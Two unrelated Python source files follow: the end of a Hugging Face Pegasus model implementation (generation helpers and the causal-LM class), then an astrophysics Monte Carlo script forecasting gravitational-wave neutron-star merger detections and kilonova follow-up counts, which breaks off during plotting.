decoder_input_ids = decoder_input_ids[:, -1:]
return {
"input_ids": None, # encoder_outputs is defined. input_ids not needed
"encoder_outputs": encoder_outputs,
"past_key_values": past,
"decoder_input_ids": decoder_input_ids,
"attention_mask": attention_mask,
"head_mask": head_mask,
"decoder_head_mask": decoder_head_mask,
"cross_attn_head_mask": cross_attn_head_mask,
"use_cache": use_cache, # change this to avoid caching (presumably for debugging)
}
def prepare_decoder_input_ids_from_labels(self, labels: torch.Tensor):
return shift_tokens_right(labels, self.config.pad_token_id, self.config.decoder_start_token_id)
@staticmethod
def _reorder_cache(past, beam_idx):
reordered_past = ()
for layer_past in past:
# cached cross_attention states don't have to be reordered -> they are always the same
reordered_past += (
tuple(past_state.index_select(0, beam_idx) for past_state in layer_past[:2]) + layer_past[2:],
)
return reordered_past
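# Illustrative usage sketch (not part of the original file; the checkpoint name and generation
# settings are just plausible examples):
#
#   >>> from transformers import PegasusTokenizer
#   >>> tok = PegasusTokenizer.from_pretrained("google/pegasus-xsum")
#   >>> model = PegasusForConditionalGeneration.from_pretrained("google/pegasus-xsum")
#   >>> batch = tok(["PEGASUS was pre-trained with gap-sentence generation."], return_tensors="pt")
#   >>> summary_ids = model.generate(**batch, num_beams=4, max_length=32)
#   >>> tok.batch_decode(summary_ids, skip_special_tokens=True)
#
# During beam search, `generate` calls `prepare_inputs_for_generation` to feed only the last
# decoder token once `past_key_values` exist, and `_reorder_cache` to keep the cached key/value
# states aligned with the surviving beams.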
# Copied from transformers.models.bart.modeling_bart.BartDecoderWrapper with Bart->Pegasus
class PegasusDecoderWrapper(PegasusPreTrainedModel):
"""
This wrapper class is a helper class to correctly load pretrained checkpoints when the causal language model is
used in combination with the :class:`~transformers.EncoderDecoderModel` framework.
"""
def __init__(self, config):
super().__init__(config)
self.decoder = PegasusDecoder(config)
def forward(self, *args, **kwargs):
return self.decoder(*args, **kwargs)
class PegasusForCausalLM(PegasusPreTrainedModel):
def __init__(self, config):
super().__init__(config)
config = copy.deepcopy(config)
config.is_decoder = True
config.is_encoder_decoder = False
self.model = PegasusDecoderWrapper(config)
self.lm_head = nn.Linear(config.hidden_size, config.vocab_size, bias=False)
self.init_weights()
def get_input_embeddings(self):
return self.model.decoder.embed_tokens
def set_input_embeddings(self, value):
self.model.decoder.embed_tokens = value
def get_output_embeddings(self):
return self.lm_head
def set_output_embeddings(self, new_embeddings):
self.lm_head = new_embeddings
def set_decoder(self, decoder):
self.model.decoder = decoder
def get_decoder(self):
return self.model.decoder
def get_position_embeddings(self) -> nn.Embedding:
"""
Returns the position embeddings matrix
"""
return self.model.decoder.get_position_embeddings()
def resize_position_embeddings(self, new_num_position_embeddings: int):
"""
Resizes position embeddings matrix of the model if :obj:`new_num_position_embeddings !=
config.max_position_embeddings`.
Arguments:
new_num_position_embeddings (:obj:`int`):
The number of new position embeddings. If position embeddings are learned, increasing the size will add
newly initialized vectors at the end, whereas reducing the size will remove vectors from the end. If
position embeddings are not learned (*e.g.* sinusoidal position embeddings), increasing the size will
add correct vectors at the end following the position encoding algorithm, whereas reducing the size
will remove vectors from the end.
"""
self.config.max_position_embeddings = new_num_position_embeddings
self.model.decoder.resize_position_embeddings(new_num_position_embeddings)
@replace_return_docstrings(output_type=CausalLMOutputWithCrossAttentions, config_class=_CONFIG_FOR_DOC)
# Copied from transformers.models.bart.modeling_bart.BartForCausalLM.forward with Bart->Pegasus
def forward(
self,
input_ids=None,
attention_mask=None,
encoder_hidden_states=None,
encoder_attention_mask=None,
head_mask=None,
cross_attn_head_mask=None,
past_key_values=None,
inputs_embeds=None,
labels=None,
use_cache=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
):
r"""
Args:
input_ids (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_length)`):
Indices of input sequence tokens in the vocabulary. Padding will be ignored by default should you
provide it.
Indices can be obtained using :class:`~transformers.PegasusTokenizer`. See
:meth:`transformers.PreTrainedTokenizer.encode` and :meth:`transformers.PreTrainedTokenizer.__call__`
for details.
`What are input IDs? <../glossary.html#input-ids>`__
attention_mask (:obj:`torch.Tensor` of shape :obj:`(batch_size, sequence_length)`, `optional`):
Mask to avoid performing attention on padding token indices. Mask values selected in ``[0, 1]``:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
`What are attention masks? <../glossary.html#attention-mask>`__
encoder_hidden_states (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length, hidden_size)`, `optional`):
Sequence of hidden-states at the output of the last layer of the encoder. Used in the cross-attention
if the model is configured as a decoder.
encoder_attention_mask (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length)`, `optional`):
Mask to avoid performing attention on the padding token indices of the encoder input. This mask is used
                in the cross-attention if the model is configured as a decoder. Mask values selected in ``[0, 1]``:
                - 1 for tokens that are **not masked**,
                - 0 for tokens that are **masked**.
head_mask (:obj:`torch.Tensor` of shape :obj:`(decoder_layers, decoder_attention_heads)`, `optional`):
Mask to nullify selected heads of the attention modules. Mask values selected in ``[0, 1]``:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
cross_attn_head_mask (:obj:`torch.Tensor` of shape :obj:`(decoder_layers, decoder_attention_heads)`, `optional`):
Mask to nullify selected heads of the cross-attention modules. Mask values selected in ``[0, 1]``:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
past_key_values (:obj:`tuple(tuple(torch.FloatTensor))`, `optional`, returned when ``use_cache=True`` is passed or when ``config.use_cache=True``):
Tuple of :obj:`tuple(torch.FloatTensor)` of length :obj:`config.n_layers`, with each tuple having 2
tensors of shape :obj:`(batch_size, num_heads, sequence_length, embed_size_per_head)`) and 2 additional
tensors of shape :obj:`(batch_size, num_heads, encoder_sequence_length, embed_size_per_head)`. The two
additional tensors are only required when the model is used as a decoder in a Sequence to Sequence
model.
Contains pre-computed hidden-states (key and values in the self-attention blocks and in the
cross-attention blocks) that can be used (see :obj:`past_key_values` input) to speed up sequential
decoding.
If :obj:`past_key_values` are used, the user can optionally input only the last ``decoder_input_ids``
(those that don't have their past key value states given to this model) of shape :obj:`(batch_size, 1)`
instead of all ``decoder_input_ids`` of shape :obj:`(batch_size, sequence_length)`.
labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_length)`, `optional`):
Labels for computing the masked language modeling loss. Indices should either be in ``[0, ...,
config.vocab_size]`` or -100 (see ``input_ids`` docstring). Tokens with indices set to ``-100`` are
ignored (masked), the loss is only computed for the tokens with labels in ``[0, ...,
config.vocab_size]``.
            use_cache (:obj:`bool`, `optional`):
                If set to :obj:`True`, :obj:`past_key_values` key value states are returned and can be used to speed up
                decoding (see :obj:`past_key_values`).
output_attentions (:obj:`bool`, `optional`):
Whether or not to return the attentions tensors of all attention layers. See ``attentions`` under
returned tensors for more detail.
output_hidden_states (:obj:`bool`, `optional`):
Whether or not to return the hidden states of all layers. See ``hidden_states`` under returned tensors
for more detail.
return_dict (:obj:`bool`, `optional`):
Whether or not to return a :class:`~transformers.file_utils.ModelOutput` instead of a plain tuple.
Returns:
Example::
>>> from transformers import PegasusTokenizer, PegasusForCausalLM
            >>> tokenizer = PegasusTokenizer.from_pretrained('google/pegasus-large')
            >>> model = PegasusForCausalLM.from_pretrained('google/pegasus-large', add_cross_attention=False)
>>> assert model.config.is_decoder, f"{model.__class__} has to be configured as a decoder."
>>> inputs = tokenizer("Hello, my dog is cute", return_tensors="pt")
>>> outputs = model(**inputs)
            >>> logits = outputs.logits
"""
output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
output_hidden_states = (
output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
)
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
# decoder outputs consists of (dec_features, layer_state, dec_hidden, dec_attn)
outputs = self.model.decoder(
input_ids=input_ids,
attention_mask=attention_mask,
encoder_hidden_states=encoder_hidden_states,
encoder_attention_mask=encoder_attention_mask,
head_mask=head_mask,
cross_attn_head_mask=cross_attn_head_mask,
past_key_values=past_key_values,
inputs_embeds=inputs_embeds,
use_cache=use_cache,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
logits = self.lm_head(outputs[0])
loss = None
if labels is not None:
loss_fct = CrossEntropyLoss()
loss = loss_fct(logits.view(-1, self.config.vocab_size), labels.view(-1))
if not return_dict:
output = (logits,) + outputs[1:]
return (loss,) + output if loss is not None else output
return CausalLMOutputWithCrossAttentions(
loss=loss,
logits=logits,
past_key_values=outputs.past_key_values,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
cross_attentions=outputs.cross_attentions,
)
def prepare_inputs_for_generation(self, input_ids, past=None, attention_mask=None, use_cache=None, **kwargs):
# if model is used as a decoder in encoder-decoder model, the decoder attention mask is created on the fly
if attention_mask is None:
attention_mask = input_ids.new_ones(input_ids.shape)
if past:
input_ids = input_ids[:, -1:]
# first step, decoder_cached_states are empty
return {
"input_ids": input_ids, # encoder_outputs is defined. input_ids not needed
"attention_mask": attention_mask,
"past_key_values": past,
"use_cache": use_cache,
}
@staticmethod
def _reorder_cache(past, beam_idx):
reordered_past = ()
for layer_past in past:
reordered_past += (tuple(past_state.index_select(0, beam_idx) for past_state in layer_past),)
return reordered_past
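# Illustrative sketch of incremental decoding with the causal-LM head above (not part of the
# original file; the checkpoint name is only an example):
#
#   >>> import torch
#   >>> from transformers import PegasusTokenizer
#   >>> tok = PegasusTokenizer.from_pretrained("google/pegasus-large")
#   >>> lm = PegasusForCausalLM.from_pretrained("google/pegasus-large", add_cross_attention=False)
#   >>> ids = tok("Hello", return_tensors="pt").input_ids
#   >>> out = lm(input_ids=ids, use_cache=True)
#   >>> next_id = out.logits[:, -1:].argmax(-1)
#   >>> # subsequent steps feed only the new token plus the cached states
#   >>> out = lm(input_ids=next_id, past_key_values=out.past_key_values, use_cache=True)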
|
the-stack_106_14769
|
#!/usr/bin/env python
import io
import pickle
import sys
import os
import random
import time
from functools import partial
from urllib import parse, request
import numpy as np
import scipy.stats as spstat
from collections import namedtuple
from astropy.time import Time
from astropy.coordinates import Distance
import astropy.table as at
import astropy.units as u, astropy.constants as c
import argparse
import matplotlib.pyplot as plt
from astropy.visualization import hist
import schwimmbad
from scipy.linalg import cholesky
import scipy.integrate as scinteg
from sklearn.preprocessing import MinMaxScaler
import inspiral_range
from ligo.computeDiskMass import computeCompactness, computeDiskMass
import lalsimulation as lalsim
from gwemlightcurves.EjectaFits import DiUj2017
np.random.RandomState(int(time.time()))
EOSNAME = "APR4_EPP"
MAX_MASS = 2.21 # specific to EoS model
detector_asd_links = dict(
ligo='https://dcc.ligo.org/public/0165/T2000012/001/aligo_O4high.txt',
virgo='https://dcc.ligo.org/public/0165/T2000012/001/avirgo_O4high_NEW.txt',
kagra='https://dcc.ligo.org/public/0165/T2000012/001/kagra_80Mpc.txt'
)
def has_ejecta_mass(m1, m2):
"""Calculate whether the binary has any remnant matter based on
    Dietrich & Ujevic (2017) or Foucart et al. (2018), assuming the APR4
    equation of state.
"""
c_ns_1, m_b_1, _ = computeCompactness(m1, EOSNAME)
c_ns_2, m_b_2, _ = computeCompactness(m2, EOSNAME)
if m_b_2 == 0.0 or m_b_1 == 0.0:
# treat as NSBH
m_rem = computeDiskMass(m1, m2, 0., 0., eosname=EOSNAME)
else:
# treat as BNS
m_rem = DiUj2017.calc_meje(m1, m_b_1, c_ns_1, m2, m_b_2, c_ns_2)
return m_rem > 0.0
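# Illustrative calls (not part of the original script); masses are in solar masses and the
# outcome depends on the APR4_EPP equation-of-state tables used by ligo.computeDiskMass:
#
#   >>> has_ejecta_mass(1.4, 1.4)   # canonical BNS pair
#   >>> has_ejecta_mass(2.5, 1.4)   # primary above the EoS maximum mass, handled via the NSBH disk-mass fit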
def get_range(detector):
psd_url = detector_asd_links[detector]
try:
# if downloaded locally
asd_fp = open(os.path.basename(parse.urlparse(psd_url).path), "rb")
except FileNotFoundError:
print(f"Downloading PSD for {detector}")
asd_fp = io.BytesIO(request.urlopen(psd_url).read())
freq, asd = np.loadtxt(asd_fp, unpack=True)
psd = asd**2
return partial(inspiral_range.range, freq, psd)
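# Illustrative usage (not part of the original script): the returned partial already has the
# PSD frequency grid bound, so only source parameters are needed:
#
#   >>> ligo_range = get_range('ligo')
#   >>> ligo_range(m1=1.4, m2=1.4)   # inspiral range in Mpc for a 1.4 + 1.4 Msun binary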
def get_correlated_series(n_events, upper_chol):
"""
Get some correlated uniformly distributed random series between 0 and 1
"""
rnd = np.random.uniform(0., 1., size=(n_events, 4))
series = rnd @ upper_chol
return series
def get_sim_dutycycles(n_events, upper_chol, h_duty, l_duty, v_duty, k_duty):
"""
Get some correlated duty cycle series
"""
series = get_correlated_series(n_events, upper_chol)
scaler = MinMaxScaler()
scaler.fit(series)
series = scaler.transform(series)
series = series.T
duty_cycles = np.zeros(series.shape)
h_series = series[0,:]
l_series = series[1,:]
v_series = series[2,:]
k_series = series[3,:]
h_on = duty_cycles[0,:]
l_on = duty_cycles[1,:]
v_on = duty_cycles[2,:]
k_on = duty_cycles[3,:]
h_on[h_series <= h_duty] = 1
l_on[l_series <= l_duty] = 1
v_on[v_series <= v_duty] = 1
k_on[k_series <= k_duty] = 1
h_on = h_on.astype(bool)
l_on = l_on.astype(bool)
v_on = v_on.astype(bool)
k_on = k_on.astype(bool)
return h_on, l_on, v_on, k_on
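# Minimal standalone sketch of the correlated duty-cycle draw (illustrative; the actual
# correlation matrix is the lvc_cor_matrix defined in main()):
#
#   >>> import numpy as np
#   >>> from scipy.linalg import cholesky
#   >>> corr = np.array([[1., 0.8, 0.5, 0.2],
#   ...                  [0.8, 1., 0.5, 0.2],
#   ...                  [0.5, 0.5, 1., 0.2],
#   ...                  [0.2, 0.2, 0.2, 1.]])
#   >>> h_on, l_on, v_on, k_on = get_sim_dutycycles(1000, cholesky(corr), 0.8, 0.8, 0.75, 0.4)
#   >>> h_on.mean()   # roughly the requested Hanford duty cycle, up to the min-max rescaling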
class MinZeroAction(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
if values <= 0 :
parser.error("Minimum value for {0} is 0".format(option_string))
setattr(namespace, self.dest, values)
def get_options(argv=None):
'''
Get commandline options
'''
parser = argparse.ArgumentParser()
    parser.add_argument('--mass_distrib', choices=['mw','flat', 'msp'], default='mw', help='Pick the BNS mass distribution')
parser.add_argument('--masskey1', type=float, action=MinZeroAction, default=1.4, help='Specify Mass Keyword 1 (mw = mean, flat=lower bound)')
parser.add_argument('--masskey2', type=float, action=MinZeroAction, default=0.09, help='Specify Mass Keyword 2 (mw = sigma, flat=upper bound)')
# Ryan's original value was -5.95 - the update comes from Alexandra Corsi's conservative estimate
# 4.7d-6*4./3.*!pi*(170.)^3.*0.75*0.7 --> ~50
# 3.2d-7*4./3.*!pi*(120.)^3.*0.75*0.7 --> 1
# BTW: conservative and reasonable choice is 1.54d-6*4./3.*!pi*(120.)^3.*0.75*0.7 --> 5-6 events (median)
parser.add_argument('--ntry', default=100, type=int, action=MinZeroAction, help='Set the number of MC samples')
parser.add_argument('--box_size', default=400., action=MinZeroAction, type=float,\
help='Specify the side of the box in which to simulate events')
parser.add_argument('--sun_loss', default=0.61, help='The fraction not observed due to sun', type=float)
    parser.add_argument('--mean_lograte', default=-6.49, help='specify the logarithm of the mean BNS rate', type=float)
parser.add_argument('--sig_lograte', default=0.5, type=float, help='specify the std of the mean BNS rate')
parser.add_argument('--hdutycycle', default=0.8, action=MinZeroAction, type=float, help='Set the Hanford duty cycle')
parser.add_argument('--ldutycycle', default=0.8, action=MinZeroAction, type=float, help='Set the Livingston duty cycle')
parser.add_argument('--vdutycycle', default=0.75, action=MinZeroAction, type=float, help='Set the Virgo duty cycle')
parser.add_argument('--kdutycycle', default=0.4, action=MinZeroAction, type=float, help='Set the Kagra duty cycle')
# duty factor motivation: https://dcc.ligo.org/public/0167/G2000497/002/G2000497_OpenLVEM_02Apr2020_kk_v2.pdf
args = parser.parse_args(args=argv)
return args
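# Example invocation (illustrative; the script name is whatever this file is saved as):
#
#   $ python bns_forecast.py --mass_distrib flat --masskey1 1.1 --masskey2 2.2 --ntry 500
#
# With --mass_distrib flat, masskey1/masskey2 are read as the lower/upper mass bounds; with the
# default 'mw' they are the mean and sigma of a truncated normal.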
def main(argv=None):
args = get_options(argv=argv)
np.random.seed(seed=42)
# setup time-ranges
ligo_run_start = Time('2022-06-01T00:00:00.0')
ligo_run_end = Time('2023-06-01T00:00:00.0')
hst_cyc_start = Time('2021-10-01T00:00:00.0')
hst_cyc_end = Time('2023-06-01T00:00:00.0')
eng_time = 2.*u.week
Range = namedtuple('Range', ['start', 'end'])
ligo_run = Range(start=ligo_run_start, end=ligo_run_end)
hst_cycle = Range(start=hst_cyc_start, end=hst_cyc_end)
latest_start = max(ligo_run.start, hst_cycle.start)
earliest_end = min(ligo_run.end, hst_cycle.end)
td = (earliest_end - latest_start) + eng_time
fractional_duration = (td/(1.*u.year)).decompose().value
box_size = args.box_size
volume = box_size**3
# create the mass distribution of the merging neutron star
mass_distrib = args.mass_distrib
# the truncated normal distribution looks to be from:
# https://arxiv.org/pdf/1309.6635.pdf
mean_mass = args.masskey1
sig_mass = args.masskey2
min_mass = args.masskey1
max_mass = args.masskey2
    # the two LIGO detectors have strongly correlated duty cycles;
    # neither is strongly correlated with Virgo
lvc_cor_matrix = np.array([[1., 0.8, 0.5, 0.2],
[0.8, 1., 0.5, 0.2],
[0.5, 0.5, 1., 0.2],
[0.2, 0.2, 0.2, 1.]])
upper_chol = cholesky(lvc_cor_matrix)
# setup duty cycles
h_duty = args.hdutycycle
l_duty = args.ldutycycle
v_duty = args.vdutycycle
k_duty = args.kdutycycle
# setup event rates
mean_lograte = args.mean_lograte
sig_lograte = args.sig_lograte
n_try = args.ntry
temp = at.Table.read('kilonova_phottable_40Mpc.txt', format='ascii')
phase = temp['ofphase']
temphmag = temp['f160w']
tempf200w = temp['f218w']
temprmag = temp['f625w']
# define ranges
ligo_range = get_range('ligo')
virgo_range = get_range('virgo')
kagra_range = get_range('kagra')
def dotry(n):
rate = 10.**(np.random.normal(mean_lograte, sig_lograte))
n_events = np.around(rate*volume*fractional_duration).astype('int')
if n_events == 0:
return tuple(0 for _ in range(15)) # FIXME: fix to prevent unpacking error
print(f"### Num trial = {n}; Num events = {n_events}")
if mass_distrib == 'mw':
mass1 = spstat.truncnorm.rvs(0, np.inf, args.masskey1, args.masskey2, n_events) # FIXME: Unbound local error
mass2 = spstat.truncnorm.rvs(0, np.inf, args.masskey1, args.masskey2, n_events)
elif mass_distrib == 'msp':
print("MSP population chosen, overriding mean_mass and sig_mass if supplied.")
# numbers from https://arxiv.org/pdf/1605.01665.pdf
# two modes, choose a random one each time
mean_mass, sig_mass = random.choice([(1.393, 0.064), (1.807, 0.177)])
mass1 = spstat.truncnorm.rvs(0, np.inf, mean_mass, sig_mass, n_events)
mass2 = spstat.truncnorm.rvs(0, np.inf, mean_mass, sig_mass, n_events)
else:
print("Flat population chosen.")
mass1 = np.random.uniform(min_mass, max_mass, n_events)
mass2 = np.random.uniform(min_mass, max_mass, n_events)
bns_range_ligo = np.array(
[ligo_range(m1=m1, m2=m2) for m1, m2 in zip(mass1, mass2)]
) * u.Mpc
bns_range_virgo = np.array(
[virgo_range(m1=m1, m2=m2) for m1, m2 in zip(mass1, mass2)]
) * u.Mpc
bns_range_kagra = np.array(
[kagra_range(m1=m1, m2=m2) for m1, m2 in zip(mass1, mass2)]
) * u.Mpc
tot_mass = mass1 + mass2
delay = np.random.uniform(0, 365.25, n_events)
delay[delay > 90] = 0
av = np.random.exponential(1, n_events)*0.4
ah = av/6.1
sss17a = -16.9 #H-band
sss17a_r = -15.8 #Rband
sss17a_f200 = -15.4591
minmag = -14.7
maxmag = sss17a - 2.
hmag = temphmag - min(temphmag)
hmag[phase < 2.5] = 0
f200mag = tempf200w - min(tempf200w)
f200mag[phase < 2.5] = 0
magindex = [(phase - x).argmin() for x in delay]
magindex = np.array(magindex)
default_value= [0,]
if n_events == 0:
return default_value, default_value, default_value, default_value, default_value, default_value, 0, 0
absm = np.random.uniform(0, 1, n_events)*abs(maxmag-minmag) + sss17a + hmag[magindex] + ah
absm = np.array(absm)
absm_f200w = np.random.uniform(0, 1, n_events)*abs(maxmag-minmag) + sss17a_f200 + f200mag[magindex]
absm_f200w = np.array(absm_f200w)
# simulate coordinates
x = np.random.uniform(-box_size/2., box_size/2., n_events)*u.megaparsec
y = np.random.uniform(-box_size/2., box_size/2., n_events)*u.megaparsec
z = np.random.uniform(-box_size/2., box_size/2., n_events)*u.megaparsec
dist = (x**2. + y**2. + z**2. + (0.05*u.megaparsec)**2.)**0.5
h_on, l_on, v_on, k_on = get_sim_dutycycles(n_events, upper_chol,
h_duty, l_duty, v_duty, k_duty)
n_detectors_on = np.array(
[sum(_) for _ in np.vstack((h_on, l_on, v_on, k_on)).T]
)
# which detectors observed
dist_ligo_bool = dist <= bns_range_ligo
dist_virgo_bool = dist <= bns_range_virgo
dist_kagra_bool = dist <= bns_range_kagra
h_on_and_observed = h_on * dist_ligo_bool
l_on_and_observed = l_on * dist_ligo_bool
v_on_and_observed = v_on * dist_virgo_bool
k_on_and_observed = k_on * dist_kagra_bool
n_detectors_on_and_obs = np.sum(np.vstack(
(h_on_and_observed, l_on_and_observed, v_on_and_observed,
k_on_and_observed)).T,
axis=1
)
two_det_obs = n_detectors_on_and_obs == 2
three_det_obs = n_detectors_on_and_obs == 3
four_det_obs = n_detectors_on_and_obs == 4
        # decide whether there is a kilonova based on remnant matter
has_ejecta_bool = [
has_ejecta_mass(m1, m2) for m1, m2 in zip(mass1, mass2)
]
distmod = Distance(dist)
obsmag = absm + distmod.distmod.value
obsmagf200w = absm_f200w + distmod.distmod.value
em_bool = obsmag < 22.
        # whether this event was not affected by the Sun
detected_events = np.where(em_bool)
sun_bool = np.random.random(len(detected_events[0])) >= args.sun_loss
em_bool[detected_events] = sun_bool
n2_gw_only = np.where(two_det_obs)[0]
n2_gw = len(n2_gw_only)
n2_good = np.where(two_det_obs & em_bool & has_ejecta_bool)[0]
n2 = len(n2_good)
# sanity check
        assert n2_gw >= n2, "GW events ({}) fewer than EM follow-up events ({})".format(n2_gw, n2)
n3_gw_only = np.where(three_det_obs)[0]
n3_gw = len(n3_gw_only)
n3_good = np.where(three_det_obs & em_bool & has_ejecta_bool)[0]
n3 = len(n3_good)
# sanity check
        assert n3_gw >= n3, "GW events ({}) fewer than EM follow-up events ({})".format(n3_gw, n3)
n4_gw_only = np.where(four_det_obs)[0]
n4_gw = len(n4_gw_only)
n4_good = np.where(four_det_obs & em_bool & has_ejecta_bool)[0]
n4 = len(n4_good)
# sanity check
        assert n4_gw >= n4, "GW events ({}) fewer than EM follow-up events ({})".format(n4_gw, n4)
return dist[n2_good].value.tolist(), tot_mass[n2_good].tolist(),\
dist[n3_good].value.tolist(), tot_mass[n3_good].tolist(),\
dist[n4_good].value.tolist(), tot_mass[n4_good].tolist(),\
obsmag[n2_good].tolist(), obsmag[n3_good].tolist(),\
            obsmag[n4_good].tolist(), obsmagf200w[n2_good].tolist(),\
obsmagf200w[n3_good].tolist(), obsmagf200w[n4_good].tolist(),\
n2, n3, n4
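    # The tuple returned by dotry() unpacks, in order, as
    #   (d2, m2, d3, m3, d4, m4, h2, h3, h4, f2, f3, f4, n2, n3, n4):
    # distances and total masses for the 2-, 3- and 4-detector samples, the corresponding
    # obsmag and obsmagf200w apparent magnitudes, and finally the three event counts.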
with schwimmbad.SerialPool() as pool:
values = list(pool.map(dotry, range(n_try)))
    print("Finished computation, plotting...")
data_dump = dict()
n_detect2 = []
n_detect3 = []
n_detect4 = []
dist_detect2 = []
mass_detect2 = []
dist_detect3 = []
mass_detect3 = []
dist_detect4 = []
mass_detect4 = []
hmag_detect2 = []
hmag_detect3 = []
hmag_detect4 = []
for idx, (d2, m2, d3, m3, d4, m4, h2, h3, h4, f2, f3, f4, n2, n3, n4) in enumerate(values):
if n2 >= 0:
n_detect2.append(n2)
            if n2 > 0:
dist_detect2 += d2
mass_detect2 += m2
hmag_detect2 += f2
if n3>=0:
n_detect3.append(n3)
if n3 > 0:
dist_detect3 += d3
mass_detect3 += m3
hmag_detect3 += f3
if n4>=0:
n_detect4.append(n4)
if n4 > 0:
dist_detect4 += d4
mass_detect4 += m4
hmag_detect4 += f4
data_dump[f"{idx}"] = {"d2": d2, "m2": m2, "d3": d3,
"m3": m3, "d4": d4, "m4": m4,
"h2": h2, "h3": h3, "h4": h4,
"f2": f2, "f3": f3, "f4": f4,
"n2": n2, "n3": n3, "n4": n4}
with open(f"data-dump-{args.mass_distrib}.pickle", "wb") as f:
pickle.dump(data_dump, f)
n_detect2 = np.array(n_detect2)
n_detect3 = np.array(n_detect3)
n_detect4 = np.array(n_detect4)
#print(f"2 det: {n_detect2};\n3 det: {n_detect3};\n4 det: {n_detect4}")
#print(f"2 det mean: {np.mean(n_detect2)};\n3 det mean: {np.mean(n_detect3)};\n4 det mean: {np.mean(n_detect4)}")
fig_kw = {'figsize':(9.5/0.7, 3.5)}
fig, axes = plt.subplots(nrows=1, ncols=3, **fig_kw)
#ebins = np.logspace(0, 1.53, 10)
#ebins = np.insert(ebins, 0, 0)
ebins = np.arange(32)
norm = np.sum(n_detect3)/np.sum(n_detect2)
vals, _, _ = axes[0].hist(n_detect2, histtype='stepfilled', \
bins=ebins, color='C0', alpha=0.3, density=True, zorder=0)
axes[0].hist(n_detect2, histtype='step', \
bins=ebins, color='C0', lw=3, density=True, zorder=3)
bin_centers = (ebins[0:-1] + ebins[1:])/2.
mean_nevents = np.mean(n_detect2)
five_percent, ninetyfive_percent = np.percentile(n_detect2, 5), np.percentile(n_detect2, 95)
axes[0].axvline(round(mean_nevents), color='C0', linestyle='--', lw=2,
label=r'$\langle N\rangle = %d ;~ N_{95} = %d$' % (round(mean_nevents), ninetyfive_percent))
axes[0].axvline(ninetyfive_percent, color='C0',
linestyle='dotted', lw=1)
#vals, bins = np.histogram(n_detect3, bins=ebins, density=True)
mean_nevents = np.mean(n_detect3)
#vals*=norm
#test = dict(zip(ebins, vals))
#print(ebins, vals)
#print("Test")
#print(test)
axes[0].hist(n_detect3, density=True, histtype='stepfilled', color='C1', alpha=0.5, bins=ebins, zorder=1)
axes[0].hist(n_detect3, density=True, histtype='step', color='C1', lw=3, bins=ebins, zorder=2)
#axes[0].hist(list(test.keys()), weights=list(test.values()), histtype='stepfilled', color='C1', alpha=0.5, bins=ebins, zorder=1)
#axes[0].hist(list(test.keys()), weights=list(test.values()), histtype='step', color='C1', lw=3, bins=ebins, zorder=2)
five_percent, ninetyfive_percent = np.percentile(n_detect3, 5), np.percentile(n_detect3, 95)
axes[0].axvline(round(mean_nevents), color='C1', linestyle='--', lw=2,
label=r'$\langle N\rangle = %d ;~ N_{95} = %d$' % (round(mean_nevents), ninetyfive_percent))
axes[0].axvline(ninetyfive_percent, color='C1',
linestyle='dotted', lw=1)
#vals, bins = np.histogram(n_detect4, bins=ebins, density=True)
mean_nevents = np.mean(n_detect4)
#vals*=norm
#test = dict(zip(ebins, vals))
axes[0].hist(n_detect4, density=True, histtype='stepfilled', color='C2', alpha=0.5, bins=ebins, zorder=1)
axes[0].hist(n_detect4, density=True, histtype='step', color='C2', lw=3, bins=ebins, zorder=2)
five_percent, ninetyfive_percent = np.percentile(n_detect4, 5), np.percentile(n_detect4, 95)
axes[0].axvline(round(mean_nevents), color='C2', linestyle='--', lw=2,
label=r'$\langle N \rangle = %d ;~ N_{95} = %d$' % (round(mean_nevents), ninetyfive_percent))
axes[0].axvline(ninetyfive_percent, color='C2',
linestyle='dotted', lw=1)
axes[0].legend(frameon=False, fontsize='small', loc='upper right')
#axes[0].set_xscale('log')
axes[0].set_yscale('log')
axes[0].set_xlim((0., 31))
#axes[0].set_ylim((1e-2, 1))
#######################################################
### print out probabilities of greater than 1 event ###
#######################################################
print("P(N > 1 event detected)")
print("For two detector", np.sum(n_detect2 > 1)/len(n_detect2))
print("For three detector", np.sum(n_detect3 > 1)/len(n_detect2))
print("For four detector", np.sum(n_detect4 > 1)/len(n_detect2))
# save number of detections
with open(f'n-events-{args.mass_distrib}.pickle', 'wb') as f:
res = dict(n_detect2=n_detect2, n_detect3=n_detect3, n_detect4=n_detect4,
dist_detect2=dist_detect2, dist_detect3=dist_detect3, dist_detect4=dist_detect4,
mass_detect2=mass_detect2, mass_detect3=mass_detect3, mass_detect4=mass_detect4,
hmag_detect2=hmag_detect2, hmag_detect3=hmag_detect3, hmag_detect4=hmag_detect4)
pickle.dump(res, f)
dist_range = np.arange(0, 400., 0.1)
patches = list()
legend_text = list()
try:
kde = spstat.gaussian_kde(dist_detect2, bw_method='scott')
pdist = kde(dist_range)
axes[1].plot(dist_range, pdist, color='C0', linestyle='-', lw=3, zorder=4)
patch1 = axes[1].fill_between(dist_range, np.zeros(len(dist_range)), pdist, color='C0', alpha=0.3, zorder=0)
patches.append(patch1)
legend_text.append('2 Detector Events')
mean_dist = np.mean(dist_detect2)
axes[1].axvline(mean_dist, color='C0', linestyle='--', lw=1.5, zorder=6, label=r'$\langle D \rangle = {:.0f}$ Mpc'.format(mean_dist))
ind0_40 = dist_range <= 40.
ind40_80 = (dist_range <= 100.) & (dist_range > 40.)
ind80_160 = (dist_range <= 160.) & (dist_range > 100.)
p0_40 = scinteg.trapz(pdist[ind0_40], dist_range[ind0_40])
p40_80 = scinteg.trapz(pdist[ind40_80], dist_range[ind40_80])
p80_160 = scinteg.trapz(pdist[ind80_160], dist_range[ind80_160])
print(p0_40*5, p40_80*5, p80_160*5)
except ValueError:
print("Could not create KDE since no 2-det detection")
try:
kde = spstat.gaussian_kde(dist_detect3, bw_method='scott')
pdist = kde(dist_range)
